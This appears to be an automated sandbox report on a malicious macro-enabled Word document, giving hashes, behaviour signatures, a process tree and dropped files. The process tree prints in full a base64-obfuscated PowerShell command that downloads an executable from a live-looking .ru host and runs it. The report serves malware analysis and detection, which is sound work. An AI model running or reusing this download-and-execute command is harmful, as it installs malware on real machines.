Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 01:09

General

  • Target

    173d644887fe55f54403e56181f9f4a61283332b264b2664bdd05f90317b9519.docm

  • Size

    519KB

  • MD5

    f81b30a64f41a0f7a310ca679a228d79

  • SHA1

    356cb6b79fc52f1b3fa931865603e8154459a0ee

  • SHA256

    173d644887fe55f54403e56181f9f4a61283332b264b2664bdd05f90317b9519

  • SHA512

    4a520ffbaca8e870bc32bbf19f3c3f93cf76ed5f6b913c69ce6eb9bf229df4f8709ccbe265a0e19822ba09d431e89e0c6d8d4be601b767f321e2c3012ea1c7ce

  • SSDEEP

    6144:ELEc+F+HLHNIvPl8qZDC9VT8L38S8WyI6OLxoq5seCsH8BB3y8dqtUO2TsyUrYA:ELEcJHNopZW9eLH8WyITLfyXXvqxjb

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://monopoliafromyou.ru/download/2.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\173d644887fe55f54403e56181f9f4a61283332b264b2664bdd05f90317b9519.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkVSA9ICdodHRwOi8vbW9ub3BvbGlhZnJvbXlvdS5ydS9kb3dubG9hZC8yLmV4ZSc7ICRQID0gJ0M6XFByb2dyYW1EYXRhXDEyMy5leGUnOyAkVy5Eb3dubG9hZEZpbGUoJFUsICRQKTsgSW52b2tlLUV4cHJlc3Npb24gJFA7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkVSA9ICdodHRwOi8vbW9ub3BvbGlhZnJvbXlvdS5ydS9kb3dubG9hZC8yLmV4ZSc7ICRQID0gJ0M6XFByb2dyYW1EYXRhXDEyMy5leGUnOyAkVy5Eb3dubG9hZEZpbGUoJFUsICRQKTsgSW52b2tlLUV4cHJlc3Npb24gJFA7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAVQAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AbQBvAG4AbwBwAG8AbABpAGEAZgByAG8AbQB5AG8AdQAuAHIAdQAvAGQAbwB3AG4AbABvAGEAZAAvADIALgBlAHgAZQAnADsAIAAkAFAAIAA9ACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAxADIAMwAuAGUAeABlACcAOwAgACQAVwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABVACwAIAAkAFAAKQA7ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABQADsA
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2152
          • C:\ProgramData\123.exe
            "C:\ProgramData\123.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: GetForegroundWindowSpam
            PID:2752
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2644

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      90fabfbdd7d5d800dc42d3b5f5233a6a

      SHA1

      3ae4c474b925a58020e351fdf5d49698dd30cd2b

      SHA256

      a0f5ae0691f83b5a944bad001a1c71de02dc68b2d0d723d9f4cd8269b87e75f2

      SHA512

      27cdb0a7bccc82c6bd6c92c86a818ab09cdd1d25405c93c26628f7dded9eef8ff879189ee4cedb55ca4fb38111a1a28eddb5deaedae26c10dee1ac59d5a899fe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      97be90094431520b6d1cf618cd3dc901

      SHA1

      ed9270d2529b71f90d08c20c3062c99c5e62bf78

      SHA256

      38535c2cc0782de7c5b4b68e70011604f46702ef5276a8011616815b38b01a40

      SHA512

      9e4629743bcb21e54bc2bc878ccd32e4fa6b8bce742997bad44cf8a2e10d2f6e9a004fe2a2d9fe616edc9d859af4f556a15f43953b6fde1a7db3bf56f185ecbd

    • \ProgramData\123.exe

      Filesize

      1.4MB

      MD5

      f43852a976edcab5a7c82d248ce242d2

      SHA1

      446ac2bb76e472c185f56b2b1246910a4438246d

      SHA256

      4a38db0744930e1f5bfc0a82f63c907f7dc94270b930a3950e6a0abbc903c47f

      SHA512

      3b4ab06664cb4c228ef0e85cc38d4035d4d2c0b4febd7fa410da65bbcc7b4eafbec924e8d14f02432125fa3d9fb22e50a87707b1c1028ad5d3f0bfbcd4b4075e

    • memory/2004-0-0x000000002FB81000-0x000000002FB82000-memory.dmp

      Filesize

      4KB

    • memory/2004-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2004-2-0x00000000719ED000-0x00000000719F8000-memory.dmp

      Filesize

      44KB

    • memory/2004-7-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/2004-34-0x00000000719ED000-0x00000000719F8000-memory.dmp

      Filesize

      44KB

    • memory/2004-35-0x00000000003D0000-0x00000000004D0000-memory.dmp

      Filesize

      1024KB

    • memory/2004-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2152-21-0x0000000005620000-0x0000000005678000-memory.dmp

      Filesize

      352KB